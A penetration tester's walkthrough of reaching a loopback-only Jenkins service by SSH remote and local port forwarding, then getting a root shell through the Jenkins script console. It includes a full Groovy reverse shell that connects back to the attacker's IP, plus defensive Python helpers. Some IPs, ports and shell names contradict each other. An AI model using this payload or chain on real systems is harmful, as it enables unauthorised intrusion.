Linux Privilege Escalation via Local and Remote Port Forwarding with SSH

Lassag Mohamed Zakaria
5 min read · Nov 26, 2022

Hello, my name is Lassag Mohamed Zakaria, I'm a Cyber Security Penetration Tester.

Today I'm going to share with you how you can exploit a vulnerable service that runs on a Linux system but is not reachable from the network, in order to elevate your privileges from a simple user to root, using the Local and Remote Port Forwarding techniques over SSH.

Requirements:

  • A shell on the target server.
  • SSH credentials for the target server.
  • SSH credentials for the attacking machine.

Description:

Port forwarding is a technique used to give external devices access to computers and services that are located on a private network.

  1. Local Port Forwarding:
  Local Port Forwarding is the most common type of port forwarding. It lets a user connect from the local computer to another server or service: traffic sent to a port on your local computer is forwarded to the SSH server, which forwards it on to a destination server.

  2. Remote Port Forwarding:
  Remote Port Forwarding is the exact opposite of Local Port Forwarding. Here, connections made to a port on the SSH server are forwarded back through the SSH client, then on to a destination server.

Scenario:

Let's imagine that we are targeting a Linux server at IP address 10.10.191.232, while our IP address is 10.9.18.106.

By one of the Initial Access techniques, we gained a reverse shell on the Linux Server Target (10.10.191.232).

We check our user's privileges on the target system and the kernel version.

image -1- (system information)

In order to discover more about the target system, we have to go through all files and folders looking for information that may lead to something sensitive.

Below, in screen number 2, we discovered cached SSH credentials in the /opt/ folder.

image -2- (ssh credentials)

We ran most of the well-known automated Linux privilege escalation enumeration tools and did not find any exploit or anything else that could lead to root.
It is always a good idea to check which services are running internally, bound only to the local host, on the compromised machine.

Command: "netstat -ant"

image -3- (netstat output)

In screen number 3, we discovered multiple services running on the compromised system.
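To make the "what is listening locally" check repeatable, here is an added example (my own code, not from the original post) that parses the text of `netstat -ant` and separates listening TCP ports bound only to loopback from those reachable on the network. The netstat sample embedded in it is constructed. From a hardening point of view, the loopback-only list is exactly the set of services that an SSH port forward would expose, so it is worth reviewing on any host that accepts SSH logins.

```python
"""Parse `netstat -ant` output and list listening TCP services, separating
those bound only to loopback (reachable from the host itself, and from
anywhere an SSH port forward can reach) from those exposed on the network.
Added example; the sample output below is constructed."""

from dataclasses import dataclass
from ipaddress import ip_address

# Constructed sample in the format `netstat -ant` prints on Linux.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN
tcp        0      0 10.10.191.232:22        10.9.18.106:51234       ESTABLISHED
tcp6       0      0 :::22                   :::*                    LISTEN
tcp6       0      0 ::1:9000                :::*                    LISTEN
"""


@dataclass(frozen=True)
class Listener:
    proto: str
    host: str
    port: int
    loopback_only: bool


def split_host_port(addr: str) -> tuple[str, int]:
    # netstat prints host:port; IPv6 hosts contain ':' themselves, so split on the last one
    host, _, port = addr.rpartition(":")
    return host, int(port)


def is_loopback(host: str) -> bool:
    # netstat writes "all interfaces" as 0.0.0.0 (IPv4) or :: (IPv6)
    if host in ("0.0.0.0", "::", ""):
        return False
    try:
        return ip_address(host).is_loopback
    except ValueError:
        return False


def parse_listeners(netstat_output: str) -> list[Listener]:
    """Return one Listener per TCP socket in LISTEN state."""
    listeners = []
    for line in netstat_output.splitlines():
        fields = line.split()
        # Skip the two header lines; only tcp/tcp6 rows carry a State column
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue
        proto, local, state = fields[0], fields[3], fields[5]
        if state != "LISTEN":
            continue
        host, port = split_host_port(local)
        listeners.append(Listener(proto, host, port, is_loopback(host)))
    return listeners


def loopback_only_ports(netstat_output: str) -> list[int]:
    """Ports with a loopback listener and no listener on any other address.
    A port bound to 127.0.0.1 for IPv4 but to :: for IPv6 is still exposed,
    so it is excluded here."""
    listeners = parse_listeners(netstat_output)
    exposed = {l.port for l in listeners if not l.loopback_only}
    return sorted({l.port for l in listeners if l.loopback_only} - exposed)


if __name__ == "__main__":
    for l in parse_listeners(SAMPLE_NETSTAT):
        scope = "loopback only" if l.loopback_only else "reachable on the network"
        print(f"{l.proto:5} {l.host}:{l.port:<6} {scope}")
    print("loopback-only ports:", loopback_only_ports(SAMPLE_NETSTAT))
```

On a real host, feed it the output of `netstat -ant` (or `ss -tan`, whose columns are close enough to adapt) and compare the loopback-only list against what the host's documentation says should be private.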

Let's check them one by one, starting with the service running on port 8080, using the curl command.

Command: "curl -v 127.0.0.1:8080"

image -4- (curl output of service running on 8080)

From the HTTP response and the HTML source returned by the curl command, we can be sure that Jenkins is the service running locally on this compromised machine.

Jenkins is an open source automation server. It helps automate the parts of software development related to building, testing, and deploying, facilitating continuous integration and continuous delivery.

Now it is time for the main topic.

First, we have to make sure that the SSH service is running on our attacking machine.

image -5- (running ssh on our local machine)

Let's start with Remote Port Forwarding, to make this local service reachable from our attacking machine, and then try to exploit it to elevate our privileges on the system to root.

On the target server we run this command: ssh -R 8080:127.0.0.1:8080 kali@my-attacking-ip

ssh -R 8080:127.0.0.1:8080 kali@10.9.18.106

  • -R: remote port forwarding; the first 8080 is the port opened on our attacking machine
  • 127.0.0.1:8080: the vulnerable service, bound to the target's loopback address
  • kali@10.9.18.106: the SSH credentials of our attacking machine
image -6- (remote port forwarding command)

Now that we have forwarded the connection to our attacking machine, let's run the netstat command to see whether the port is open there.

image -7- (netstat output on my attacking machine)

The Jenkins service is now accessible from our attacking machine.

image -8- (Jenkins Service accessible remotely)

The second technique is also useful in this scenario. As the title says, we will use Local Port Forwarding with SSH to make this local service accessible remotely.

This time the Local Port Forwarding command is run on my attacking machine, unlike the first time, with a small modification.

Command on my attacking machine: sudo ssh -L 8080:127.0.0.1:8080 user@ssh-of-server-target

ssh -L 8080:127.0.0.1:8080 aubreanna@10.10.191.132

In screens 9 and 10 we see that the second technique, Local Port Forwarding, was also successful in this scenario.

image -9- (local port forwarding command)
image -10- (netstat output on my attacking machine)
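Because the two commands above differ only in the flag, it is easy to confuse which host ends up listening. The following added example (my own code, not from the original post) parses the `[bind_address:]port:host:hostport` spec that `ssh -L` and `ssh -R` accept and spells out, for a given SSH client and server, which side listens and which side makes the onward connection. The IP addresses are the ones from the scenario above; the bracketed IPv6 form of the spec is not handled.

```python
"""Describe what an OpenSSH -L or -R forwarding spec does: which side opens
the listening port and which side makes the outbound connection.
Added example, not from the original post."""

from dataclasses import dataclass


@dataclass(frozen=True)
class Forward:
    kind: str          # "local" for -L, "remote" for -R
    bind_address: str  # address the listener binds to; OpenSSH defaults to loopback
    listen_port: int
    target_host: str   # interpreted by the side that makes the onward connection
    target_port: int


def parse_forward(flag: str, spec: str) -> Forward:
    """Parse '[bind_address:]port:host:hostport' as given after ssh -L or ssh -R."""
    kinds = {"-L": "local", "-R": "remote"}
    if flag not in kinds:
        raise ValueError(f"expected -L or -R, got {flag!r}")
    parts = spec.split(":")
    if len(parts) == 3:
        bind, port, host, hostport = "", *parts
    elif len(parts) == 4:
        bind, port, host, hostport = parts
    else:
        raise ValueError(f"unrecognised forwarding spec {spec!r}")
    # An empty bind address means OpenSSH picks loopback (for -R only if the
    # server's GatewayPorts setting allows nothing wider).
    return Forward(kinds[flag], bind or "loopback (default)", int(port), host, int(hostport))


def describe(fw: Forward, client: str, server: str) -> str:
    """Plain-language summary of where the listener lives and where traffic goes.
    client = the host running `ssh`, server = the host running sshd."""
    if fw.kind == "local":
        listener, connector = client, server   # -L: the ssh client listens
    else:
        listener, connector = server, client   # -R: the sshd side listens
    return (f"{listener} listens on {fw.bind_address}:{fw.listen_port}; "
            f"each connection is carried over the SSH session and {connector} "
            f"connects it to {fw.target_host}:{fw.target_port} as seen from {connector}")


if __name__ == "__main__":
    target, attacker = "10.10.191.232", "10.9.18.106"
    # First command in the article, run on the target: ssh -R 8080:127.0.0.1:8080 kali@attacker
    print(describe(parse_forward("-R", "8080:127.0.0.1:8080"), client=target, server=attacker))
    # Second command, run on the attacking machine: ssh -L 8080:127.0.0.1:8080 user@target
    print(describe(parse_forward("-L", "8080:127.0.0.1:8080"), client=attacker, server=target))
```

Both descriptions end the same way: 127.0.0.1:8080 is resolved by the target, which is why a service bound only to the target's loopback becomes reachable. On a server you administer, `AllowTcpForwarding no` in sshd_config disables both directions for every user, and `GatewayPorts` controls whether a `-R` listener may bind to anything other than loopback.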

Privilege Escalation:

Let's go through another scenario: exploiting Jenkins to elevate our current user on the compromised machine to root.

I won't waste more time on scenarios; let's imagine that we have found a way to access the control panel of this service.

We will use these credentials in the browser:

http://127.0.0.1:8080/login?from=%2F

Username : admin

Password : XXXX

image -11- (Jenkins panel)

The last step is finding a way to upload or run our reverse shell code.

URL: http://127.0.0.1:8080/script

This console allows a user to run commands for automation and reporting using a Groovy script. With this privilege, the attacker can use revsh.groovy to get a reverse shell session back to the attacking machine.

Groovy reverse shell:

String host="localhost";int port=8044;String cmd="cmd.exe";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

We will have to change the values of three parameters.

  • host: my IP address, which is 10.9.18.106
  • port: my local port, which is 4444
  • cmd: "sh"
image -11- (running rev shell code on Jenkins)
image -12- (receiving reverse shell connection)

Once we received our reverse shell connection from the compromised server, after some researching, exploring and enumerating the service, we found the root credentials.

Let’s use them and connect with ssh.

image -15- (root access)

I hope you have enjoyed this small scenario.

Best regards